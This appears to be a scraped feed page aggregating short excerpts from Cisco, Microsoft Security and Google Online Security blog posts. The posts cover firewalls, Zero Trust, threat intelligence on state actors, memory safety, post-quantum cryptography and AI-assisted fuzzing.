Happy Third Birthday to Secure MSP Center Happy Third Birthday to Secure MSP Center

It is hard to believe that this November, we will be celebrating the third anniversary of the launch of Secure MSP Center.

We have come a long way from having MSPs buy single products to offering a streamlined, comprehensive program and dashboard for MSPs through Secure MSP Center and MSP Hub.

We took this feedback to heart and built Secure MSP Center.

You can learn more about the benefits of this dashboard from my previous blog: Up your Quality of Life with Secure MSP Hub and Secure MSP Center.

To learn more visit Secure MSP Center or email us at MSP Sales.

2 weeks, 4 days назад @ blogs.cisco.com
Reducing Help Desk Tickets With Cisco’s User Protection Suite
Reducing Help Desk Tickets With Cisco’s User Protection Suite Reducing Help Desk Tickets With Cisco’s User Protection Suite

While there are many benefits of help desk tickets, there are also hidden costs.

How to reduce help desk ticketsOne way to reduce help desk tickets is to implement technology solutions that make access easy for end users.

And by improving the user experience for remote access, this proactively reduces the creation of help desk tickets.

Impact of User Protection Suite toolsCustomers who are using Cisco’s User Protection Suite tools have seen the positive impact of reducing help desk tickets, and the burden on the IT team.

Overall, help desk tickets are an important tool to enable organizations to operate.

2 weeks, 5 days назад @ blogs.cisco.com
Business Leader’s Guide for a Successful Microsegmentation Project
Business Leader’s Guide for a Successful Microsegmentation Project Business Leader’s Guide for a Successful Microsegmentation Project

Here’s how to ensure your microsegmentation project is a success, without getting lost in the technical details.

Microsegmentation is a long-term investment in your organization’s security, providing not only protecting today but also adaptability for tomorrow’s challenges.

Gathering the ingredients: Preparation is keyA successful microsegmentation project requires more than just your IT or security department — it needs a cross-functional team.

For this initiative to truly work, the project team must include voices from across the organization: IT, security, application owners, key business leaders and project sponsors.

This knowledge, held by teams across the business, is critical to a su…

2 weeks, 6 days назад @ blogs.cisco.com
Robust Intelligence, Now Part of Cisco, Recognized as a 2024 Gartner® Cool Vendor™ for AI Security
Robust Intelligence, Now Part of Cisco, Recognized as a 2024 Gartner® Cool Vendor™ for AI Security Robust Intelligence, Now Part of Cisco, Recognized as a 2024 Gartner® Cool Vendor™ for AI Security

Cisco is excited to share that Robust Intelligence, a recently acquired AI security startup, has been mentioned in the first ever 2024 Gartner Cool Vendors for AI Security report.

The responsibility of AI security is shared by those developing AI applications and the security and governance teams protecting sensitive data at an organizational level.

As a pioneer in this space, Robust Intelligence introduced the first-ever AI Firewall to the market as part of their comprehensive AI security platform.

Robust Intelligence continues to be at the forefront of AI security innovation, from creating the industry’s first AI Firewall to conducting breakthrough AI research.

Gartner, Cool Vendors for A…

3 weeks, 6 days назад @ blogs.cisco.com
Converge Your WAN and Security With Cisco Firewall
Converge Your WAN and Security With Cisco Firewall Converge Your WAN and Security With Cisco Firewall

Cisco Secure Firewall is an exceptionally robust firewall solution with innovative features such as Snort IPS, URL filtering, and malware defense.

However, organizations can overcome these challenges by leveraging a secure firewall solution for simplified and secure branch deployment.

The management center integrates with the Cisco Security Cloud and Cisco Defense Orchestrator (CDO) for this functionality.

More details about the templates could be found here: Zero touch provisioning with Cisco Firewall Management Center Templates – Cisco Blogs.

Cisco Security Social ChannelsInstagramFacebookTwitterLinkedInShareShare:

1 month назад @ blogs.cisco.com
Leveraging Threat Intelligence in Cisco Secure Network Analytics, Part 2
Leveraging Threat Intelligence in Cisco Secure Network Analytics, Part 2 Leveraging Threat Intelligence in Cisco Secure Network Analytics, Part 2

In this part, we cover leveraging public Cisco Talos blogs and third-party threat intelligence data with Cisco Secure Network Analytics.

Cisco Talos BlogsThe talented researchers at Cisco Talos regularly publish blogs on threats and vulnerabilities.

We can use these blogs and GitHub files to build Custom Security Events in Cisco Secure Network Analytics.

They work the same way we handled internal threat intelligence in the first part of this blog or Cisco Talos blogs shown above.

Host group parent/child relationshipsA good practice for building parent and child host groups is to create a new parent host group for any distinct sources.

1 month назад @ blogs.cisco.com
NetSecOPEN: Cisco Firewall Outperforms Competition in Real-World Testing
NetSecOPEN: Cisco Firewall Outperforms Competition in Real-World Testing NetSecOPEN: Cisco Firewall Outperforms Competition in Real-World Testing

The NetSecOPEN report confirms the advanced security capabilities of Cisco Secure Firewall, with 98% threat efficacy, 100% detection for evasive threats, and 100% block rate under heavy load conditions.

In testing, with its cutting-edge FPGA design, Cisco Secure Firewall 3105 maintained an impressive 4.17 Gbps throughput.

With Cisco Secure Firewall, businesses can confidently enable advanced security features without compromising speed.

Cisco Secure Firewall empowers you to face the future without trade-offs, offering seamless protection today and tomorrow.

We have verified what Cisco Secure Firewall has steadily offered: industry-leading protection with effective speed while closing securi…

1 month назад @ blogs.cisco.com
Overview of Cybersecurity Regulations in the Middle East Region, Part 1
Overview of Cybersecurity Regulations in the Middle East Region, Part 1 Overview of Cybersecurity Regulations in the Middle East Region, Part 1

The Middle East region is quickly emerging as a new, dynamic player in the world of cybersecurity regulations.

State of QatarThe State of Qatar’s cybersecurity regulatory framework consists of legislations, international standards and strategy guidelines placed within various cybersecurity frameworks, introduced across different strategic and business sectors.

It also includes strategies focused on setting up a collaborative environment aimed at building and cultivating national cybersecurity capabilities.

As part of the National Cybersecurity Strategy (NCS), the National Cybersecurity Authority (NCA) was established in 2017 to regulate and improve the cybersecurity landscape in the KSA wit…

1 month назад @ blogs.cisco.com
Trust Through Transparency: Regulation’s Role in Consumer Confidence
Trust Through Transparency: Regulation’s Role in Consumer Confidence Trust Through Transparency: Regulation’s Role in Consumer Confidence

For the past six years, Cisco has been studying consumer sentiment across the privacy landscape and the evolution of privacy from a compliance matter to a consumer requirement.

Growing regulatory awareness fosters consumer confidenceThere are now more than 160 countries with national or multinational privacy laws in place.

With the strong correlation between regulatory awareness and consumer confidence, transparency can be a differentiator when it comes to customer trust.

Transparency as a driver of trust in the AI eraThis consumer awareness coincides with the rapid advancement of Generative AI (Gen AI).

Explore these trends and more in the Cisco 2024 Consumer Privacy Survey.

1 month, 1 week назад @ blogs.cisco.com
SOC Findings Report From RSA Conference 2024
SOC Findings Report From RSA Conference 2024 SOC Findings Report From RSA Conference 2024

Discover key insights from the SOC Findings Report at RSA Conference 2024, co-released by Cisco and NetWitness for Cybersecurity Awareness Month.

1 month, 2 weeks назад @ feedpress.me
Microsoft Security Microsoft Security
последний пост 3 days, 12 hours назад
Why security leaders trust Microsoft Sentinel to modernize their SOC​​
Why security leaders trust Microsoft Sentinel to modernize their SOC​​ Why security leaders trust Microsoft Sentinel to modernize their SOC​​

Security information and event management (SIEM) solutions have long served as the indispensable nerve center for the security operations center (SOC).

Microsoft Sentinel Transform SecOps with Microsoft Sentinel, powered by the cloud and AI.

Learn moreLearn more about Microsoft Sentinel, and read the Microsoft Sentinel datasheet.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

2Generative AI and Security Operations Center Productivity: Evidence from Live Operations, Microsoft study by James Bono, Alec Xu, Justin Grana.

3 days, 12 hours назад @ microsoft.com
​​8 years as a Leader in the Gartner® Magic Quadrant™ for Access Management​​
​​8 years as a Leader in the Gartner® Magic Quadrant™ for Access Management​​ ​​8 years as a Leader in the Gartner® Magic Quadrant™ for Access Management​​

Delivering on identity and access management for customersWe believe our 2024 Gartner® Magic Quadrant™ recognition validates our commitment to delivering a comprehensive, AI-powered and automated identity portfolio to customers, with Microsoft Entra.

Provide only the access necessary with right-size permissions, access lifecycle management, and least-privilege access for any identity.

Learn moreYou can learn more by reading the full 2024 Gartner® Magic Quadrant™ for Access Management report.

Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact.

Gartner, Magic Quadrant for Access Management, 2 December 2024…

3 days, 13 hours назад @ microsoft.com
Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage
Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage

Compromise and post-compromise activitiesSince November 2022, Microsoft Threat Intelligence has observed Secret Blizzard compromising the C2 infrastructure of a Pakistan-based espionage cluster that we track as Storm-0156.

The initial access mechanism used by Secret Blizzard to compromise Storm-0156 infrastructure is currently not known.

Secret Blizzard and Storm-0156 chain of compromiseIn August 2024, Microsoft observed Secret Blizzard using a CrimsonRAT compromise that Storm-0156 had established in March 2024.

Search for file-based IOCs:Search for network IOCs:Indicators of compromiseStorm-0156 compromise-associated malwareIndicator Type Association Last seen e298b83891b192b8a2782e638e7f5…

4 days, 13 hours назад @ microsoft.com
Explore new Microsoft Entra capabilities at Gartner Identity & Access Management Summit 2024
Explore new Microsoft Entra capabilities at Gartner Identity & Access Management Summit 2024 Explore new Microsoft Entra capabilities at Gartner Identity & Access Management Summit 2024

Identity and network access is the foundation of modern cybersecurity, with 66% of attacks involving compromised identities.¹ Equipping identity professionals to secure access to everything has never been so critical.

At Gartner IAM Summit, Microsoft Security will showcase the Microsoft Entra Suite—a complete Zero Trust employee access solution.

Last month at Microsoft Ignite we announced new capabilities—now in preview—for Microsoft Security Copilot, which is now embedded in Microsoft Entra.

How to engage with Microsoft Security at Gartner IAM SummitWe’re excited to show off the new capabilities of Copilot in Microsoft Entra, as well as other Entra capabilities, throughout our presence at …

4 days, 14 hours назад @ microsoft.com
​​Follow-up on Ignite with Ask Microsoft Anything: Microsoft Security edition​​
​​Follow-up on Ignite with Ask Microsoft Anything: Microsoft Security edition​​ ​​Follow-up on Ignite with Ask Microsoft Anything: Microsoft Security edition​​

This was a major theme across the majority of the big news and reveals from Microsoft Security at Microsoft Ignite 2024.

Tech Community Live: Microsoft Security Ask us anything about simplified, end-to-end, AI-driven protection with Microsoft Security!

Sign up nowAI transformation requires security transformationBefore Microsoft Ignite officially began, hundreds of security and IT professionals gathered early for the Microsoft Ignite Security Forum to hear from Microsoft Security product leaders about Microsoft’s threat intelligence and AI research, among other security strategy topics.

The keynote ended with Executive Vice President of Microsoft Security Charlie Bell, joined by Corporate V…

6 days, 13 hours назад @ microsoft.com
Microsoft shares latest intelligence on North Korean and Chinese threat actors at CYBERWARCON
Microsoft shares latest intelligence on North Korean and Chinese threat actors at CYBERWARCON Microsoft shares latest intelligence on North Korean and Chinese threat actors at CYBERWARCON

When the target contacts the threat actor, the threat actor sends a script – a .scpt file (Mac) or a Visual Basic Script (.vbs) file (Windows) – to “fix the connection issue”.

The threat actor then works towards obtaining cryptocurrency wallets and other credentials on the compromised device, enabling the threat actor to steal cryptocurrency.

These threat actors continue to conduct operations while using tooling and techniques against targets that often overlap with another threat actor’s operation.

Learn moreFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To hear stories and…

2 weeks, 2 days назад @ microsoft.com
AI innovations for a more secure future unveiled at Microsoft Ignite
AI innovations for a more secure future unveiled at Microsoft Ignite

Company delivers advances in AI and posture management, unprecedented bug bounty program, and updates on its Secure Future Initiative.

The post AI innovations for a more secure future unveiled at Microsoft Ignite appeared first on Microsoft Security Blog.

2 weeks, 5 days назад @ microsoft.com
Microsoft Data Security Index annual report highlights evolving generative AI security needs
Microsoft Data Security Index annual report highlights evolving generative AI security needs

84% of surveyed organizations want to feel more confident about managing and discovering data input into AI apps and tools.

The post Microsoft Data Security Index annual report highlights evolving generative AI security needs appeared first on Microsoft Security Blog.

3 weeks, 4 days назад @ microsoft.com
DoD Zero Trust Strategy proves security benchmark years ahead of schedule with Microsoft collaboration
DoD Zero Trust Strategy proves security benchmark years ahead of schedule with Microsoft collaboration DoD Zero Trust Strategy proves security benchmark years ahead of schedule with Microsoft collaboration

As part of the department’s ongoing assessments of zero trust implementation, Flank Speed just underwent its second round of security assessments sponsored by the DoD Zero Trust Portfolio Management Office (PfMO)—with tremendous results.

DoD Zero Trust Report The United States Navy is proving that Zero Trust goes beyond compliance standards and has become a proven security methodology with real world results.

The DoD expanded beyond traditional penetration testing to thoroughly evaluate all 152 zero trust activities.

This comprehensive and extensible zero trust platform supports a range of environments including hybrid cloud, multicloud, and multiplatform needs.

Also, follow us on LinkedIn …

3 weeks, 6 days назад @ microsoft.com
More value, less risk: How to implement generative AI across the organization securely and responsibly
More value, less risk: How to implement generative AI across the organization securely and responsibly More value, less risk: How to implement generative AI across the organization securely and responsibly

To maximize the advantages of generative AI, we need to strike a balance between addressing the potential risks and embracing innovation.

In our recent strategy paper, “Minimize Risk and Reap the Benefits of AI,” we provide a comprehensive guide to navigating the challenges and opportunities of using generative AI.

We offer best practices for aligning AI initiatives with legal and ethical standards, including establishing ethics committees and leveraging frameworks like the NIST AI Risk Management Framework.

Explore concrete actions for the futureAs your organization adopts generative AI, it’s critical to implement responsible AI principles—including fairness, reliability, safety, privacy, …

1 month назад @ microsoft.com
​​Zero Trust Workshop: Advance your knowledge with an online resource
​​Zero Trust Workshop: Advance your knowledge with an online resource ​​Zero Trust Workshop: Advance your knowledge with an online resource

Zero Trust Workshop A comprehensive technical guide to help customers and partners adopt a Zero Trust strategy and deploy security solutions end-to-end to secure their organizations.

The Zero Trust Workshop is a great starting point for our customers who want to embrace Zero Trust principles, but don’t know how to align the technology they already own.

The Zero Trust Strategy workshop: This is a guided breakdown of the Zero Trust areas according to the standard Zero Trust pillars (Identity, Devices, Data, Network, Infrastructure and Application, and Security Operations).

I invite you to check out the Zero Trust Workshop site where we have detailed training videos and content.

Additional res…

1 month назад @ microsoft.com
How Microsoft Defender for Office 365 innovated to address QR code phishing attacks
How Microsoft Defender for Office 365 innovated to address QR code phishing attacks How Microsoft Defender for Office 365 innovated to address QR code phishing attacks

Unique characteristics of QR code phishing campaignsSecurity 101: What is phishing?

Learn moreLike with other phishing techniques, the goal of QR code phishing attacks is to get the user to click on a malicious link that seems legitimate.

The necessity of innovation in QR code phishing defenseInnovation in the face of evolving QR code phishing risk is not just beneficial, it’s imperative.

In response to the growing threat of QR code phishing, Microsoft Defender for Office 365 took decisive action to leverage advanced machine learning and AI—developing robust defenses capable of detecting and neutralizing QR code phishing attacks in real time.

QR code phishing blocked by Microsoft Defender f…

1 month назад @ microsoft.com
​​Microsoft now a Leader in three major analyst reports for SIEM
​​Microsoft now a Leader in three major analyst reports for SIEM ​​Microsoft now a Leader in three major analyst reports for SIEM

An invalid set of parameters has been specified in the url.

1 month, 1 week назад @ techcommunity.microsoft.com
​​Microsoft now a Leader in three major analyst reports for SIEM
​​Microsoft now a Leader in three major analyst reports for SIEM

Microsoft is positioned in the Leaders Category in the 2024 IDC MarketScape for worldwide SIEM for Enterprise—making it the third major analyst report in SIEM to name Microsoft as a Leader. The post ​​Microsoft now a Leader in three major analyst reports for SIEM appeared first on Microsoft Security Blog.

1 month, 1 week назад @ techcommunity.microsoft.com
Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network
Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network

Microsoft assesses that credentials acquired from CovertNetwork-1658 password spray operations are used by multiple Chinese threat actors.

Microsoft assesses that multiple Chinese threat actors use the credentials acquired from CovertNetwork-1658 password spray operations to perform computer network exploitation (CNE) activities.

Steps taken to prepare the router for password spray operationsCovertNetwork-1658 is observed conducting their password spray campaigns through this proxy network to ensure the password spray attempts originate from the compromised devices.

Password spray activity from CovertNetwork-1658 infrastructureMicrosoft has observed multiple password spray campaigns origina…

1 month, 1 week назад @ microsoft.com
Google Online Security Blog Google Online Security Blog
последний пост 3 days, 12 hours назад
Announcing the launch of Vanir: Open-source Security Patch Validation
Announcing the launch of Vanir: Open-source Security Patch Validation Announcing the launch of Vanir: Open-source Security Patch Validation

Today, we are announcing the availability of Vanir, a new open-source security patch validation tool.

In collaboration with the Google Open Source Security Team, we have incorporated feedback from our early adopters to improve Vanir and make it more useful for security professionals.

These algorithms have low false-alarm rates and can effectively handle broad classes of code changes that might appear in code patch processes.

The Vanir signatures for Android vulnerabilities are published through the Open Source Vulnerabilities (OSV) database.

You can also contribute to Vanir by providing vulnerability data with Vanir signatures to OSV.

3 days, 12 hours назад @ security.googleblog.com
Leveling Up Fuzzing: Finding more vulnerabilities with AI
Leveling Up Fuzzing: Finding more vulnerabilities with AI Leveling Up Fuzzing: Finding more vulnerabilities with AI

But these particular vulnerabilities represent a milestone for automated vulnerability finding: each was found with AI, using AI-generated and enhanced fuzz targets.

The ideal solution would be to completely automate the manual process of developing a fuzz target end to end:Drafting an initial fuzz target.

Running the corrected fuzz target for a longer period of time, and triaging any crashes to determine the root cause.

In January 2024, we open sourced the framework that we were building to enable an LLM to generate fuzz targets.

New results: More code coverage and discovered vulnerabilitiesWe’re now able to automatically gain more coverage in 272 C/C++ projects on OSS-Fuzz (up from 160), …

2 weeks, 4 days назад @ security.googleblog.com
Retrofitting Spatial Safety to hundreds of millions of lines of C++
Retrofitting Spatial Safety to hundreds of millions of lines of C++ Retrofitting Spatial Safety to hundreds of millions of lines of C++

Based on an analysis of in-the-wild exploits tracked by Google's Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade:Breakdown of memory safety CVEs exploited in the wild by vulnerability classGoogle is taking a comprehensive approach to memory safety.

This leads to an exponential decline in memory safety vulnerabilities and quickly improves the overall security posture of a codebase, as demonstrated by our post about Android's journey to memory safety.

We’ve begun by enabling hardened libc++, which adds bounds checking to standard C++ data structures, eliminating a significant class of spatial safety bugs.

This improves spat…

3 weeks, 2 days назад @ security.googleblog.com
Safer with Google: New intelligent, real-time protections on Android to keep you safe
Safer with Google: New intelligent, real-time protections on Android to keep you safe Safer with Google: New intelligent, real-time protections on Android to keep you safe

That’s why we’re using the best of Google AI to identify and stop scams before they can do harm with Scam Detection.

Scam Detection is off by default, and you can decide whether you want to activate it for future calls.

Scam Detection is off by default, and you can decide whether you want to activate it for future calls.

Cutting-edge AI protection, now on more Pixel phones: Gemini Nano, our advanced on-device AI model, powers Scam Detection on Pixel 9 series devices.

We look forward to learning from this beta and your feedback, and we’ll share more about Scam Detection in the months ahead.

3 weeks, 4 days назад @ security.googleblog.com
5 new protections on Google Messages to help keep you safe
5 new protections on Google Messages to help keep you safe 5 new protections on Google Messages to help keep you safe

Every day, over a billion people use Google Messages to communicate.

That’s why we’ve made security a top priority, building in powerful on-device, AI-powered filters and advanced security that protects users from 2 billion suspicious messages a month.

With end-to-end encrypted1 RCS conversations, you can communicate privately with other Google Messages RCS users.

We're committed to constantly developing new controls and features to make your conversations on Google Messages even more secure and private.

As part of cybersecurity awareness month, we're sharing five new protections to help keep you safe while using Google Messages on Android:

1 month, 2 weeks назад @ security.googleblog.com
Safer with Google: Advancing Memory Safety
Safer with Google: Advancing Memory Safety Safer with Google: Advancing Memory Safety

Our internal analysis estimates that 75% of CVEs used in zero-day exploits are memory safety vulnerabilities.

Our Secure by Design commitment emphasizes integrating security considerations, including robust memory safety practices, throughout the entire software development lifecycle.

This post builds upon our previously reported Perspective on Memory Safety, and introduces our strategic approach to memory safety.

By open-sourcing these tools, we've empowered developers worldwide to reduce the likelihood of memory safety vulnerabilities in C and C++ codebases.

Migration to Memory-Safe Languages (MSLs)The first pillar of our strategy is centered on further increasing the adoption of memory-s…

1 month, 3 weeks назад @ security.googleblog.com
Bringing new theft protection features to Android users around the world
Bringing new theft protection features to Android users around the world Bringing new theft protection features to Android users around the world

Situations like Janine’s highlighted the need for a comprehensive solution to phone theft that exceeded existing tools on any platform.

These advanced theft protection features are now available to users around the world through Android 15 and a Google Play Services update (Android 10+ devices).

These theft protection features are just one example of how Android is working to provide real-world protection for everyone.

You can turn on the new Android theft features by clicking here on a supported Android device.

Learn more about our theft protection features by visiting our help center.

1 month, 3 weeks назад @ security.googleblog.com
Using Chrome's accessibility APIs to find security bugs
Using Chrome's accessibility APIs to find security bugs Using Chrome's accessibility APIs to find security bugs

If only the whole tree of Chrome UI controls were exposed, somehow, such that we could enumerate and interact with each UI control automatically.

We need to amortize that cost over thousands of test cases by running a batch of them within each browser invocation.

Yet this is tricky, since Chrome UI controls are deeply nested and often anonymous.

This approach has proven to be about 80% as quick as the original ordinal-based mutator, while providing stable test cases.

If you’d like to follow along, keep an eye on our coverage dashboard as it expands to cover UI code.

1 month, 4 weeks назад @ security.googleblog.com
Pixel's Proactive Approach to Security: Addressing Vulnerabilities in Cellular Modems
Pixel's Proactive Approach to Security: Addressing Vulnerabilities in Cellular Modems Pixel's Proactive Approach to Security: Addressing Vulnerabilities in Cellular Modems

Most smartphones use cellular baseband processors with tight performance constraints, making security hardening difficult.

The Cellular BasebandThe cellular baseband within a smartphone is responsible for managing the device's connectivity to cellular networks.

The firmware within the cellular baseband, similar to any software, is susceptible to bugs and errors.

For example, 0-day exploits in the cellular baseband are being used to deploy the Predator malware in smartphones.

Pixel's proactive approach to security demonstrates a commitment to protecting its users across the entire software stack.

2 months назад @ security.googleblog.com
Evaluating Mitigations & Vulnerabilities in Chrome
Evaluating Mitigations & Vulnerabilities in Chrome Evaluating Mitigations & Vulnerabilities in Chrome

The Chrome Security Team is constantly striving to make it safer to browse the web.

We invest in mechanisms to make classes of security bugs impossible, mitigations that make it more difficult to exploit a security bug, and sandboxing to reduce the capability exposed by an isolated security issue.

Historically the Chrome Security Team has made major investments and driven the web to be safer.

In the longer-term the Chrome Security Team advocates for operating system improvements like less-capable lightweight processes, less-privileged GPU and NPU containers, improved application isolation, and support for hardware-based isolation, memory safety and flow control enforcement.

Good Bugs and Ba…

2 months назад @ security.googleblog.com
Eliminating Memory Safety Vulnerabilities at the Source
Eliminating Memory Safety Vulnerabilities at the Source Eliminating Memory Safety Vulnerabilities at the Source

Memory safety vulnerabilities remain a pervasive threat to software security.

We’ll also share updated data on how the percentage of memory safety vulnerabilities in Android dropped from 76% to 24% over 6 years as development shifted to memory safe languages.

This decision was driven by the increasing cost and complexity of managing memory safety vulnerabilities.

We first reported this decline in 2022, and we continue to see the total number of memory safety vulnerabilities dropping3.

As the number of memory safety vulnerabilities have dropped, the overall security risk has dropped along with it.

2 months, 2 weeks назад @ security.googleblog.com
Google & Arm - Raising The Bar on GPU Security
Google & Arm - Raising The Bar on GPU Security Google & Arm - Raising The Bar on GPU Security

Arm Product Security and GPU TeamsArm has a central product security team that sets the policy and practice across the company.

Working together to secure Android devicesGoogle’s Android Security teams and Arm have been working together for a long time.

So “application ⇒ kernel ⇒ firmware ⇒ kernel” is a known attack flow in this area.

The Arm Product Security Team is actively involved in security-focused industry communities and collaborates closely with its ecosystem partners.

The Android Red Team and Arm continue to work together to proactively raise the bar on GPU security.

2 months, 2 weeks назад @ security.googleblog.com
A new path for Kyber on the web
A new path for Kyber on the web A new path for Kyber on the web

We previously posted about experimenting with a hybrid post-quantum key exchange, and enabling it for 100% of Chrome Desktop clients.

The hybrid key exchange used both the pre-quantum X25519 algorithm, and the new post-quantum algorithm Kyber.

As a result, the codepoint in TLS for hybrid post-quantum key exchange is changing from 0x6399 for Kyber768+X25519, to 0x11EC for ML-KEM768+X25519.

Post-quantum cryptography is too big to be able to offer two post-quantum key share predictions at the same time.

Longer term, we hope to avoid the chicken-and-egg problem for post-quantum key share predictions through our emerging IETF draft for key share prediction.

2 months, 3 weeks назад @ security.googleblog.com
Deploying Rust in Existing Firmware Codebases
Deploying Rust in Existing Firmware Codebases Deploying Rust in Existing Firmware Codebases

The Android team has discussed Rust for bare-metal firmware previously, and has developed training specifically for this domain.

The shim serves as a wrapper around the Rust library API, bridging the existing C API and the Rust API.

Choosing a Pre-Existing Crate (Rust Library)Picking the right open-source crate (Rust library) to replace the chosen component is crucial.

[no_std]#[cfg(feature = "std")] extern crate std; extern crate alloc;Then, iteratively fix all occurring compiler errors as follows:Move any use directives from std to either core or alloc.

Memory Safety for Firmware, TodayUsing the process outlined in this blog post, You can begin to introduce Rust into large legacy firmware…

3 months назад @ security.googleblog.com
Private AI For All: Our End-To-End Approach to AI Privacy on Android
Private AI For All: Our End-To-End Approach to AI Privacy on Android Private AI For All: Our End-To-End Approach to AI Privacy on Android

As a pioneer in responsible AI and cutting-edge privacy technologies like Private Compute Core and federated learning, we made sure our approach to the assistant experience with Gemini on Android is aligned with our existing Secure AI framework, AI Principles and Privacy Principles.

From privacy on-device when handling sensitive data to the world’s best cloud infrastructure, here are six key ways we keep your information private and protected.

For some AI features, like Summarize in Recorder on Pixel, that benefit from additional data privacy or processing efficiency, we utilize on-device AI.

It can be thought of as extending the user’s device and its security boundaries into our cloud infr…

3 months, 3 weeks назад @ security.googleblog.com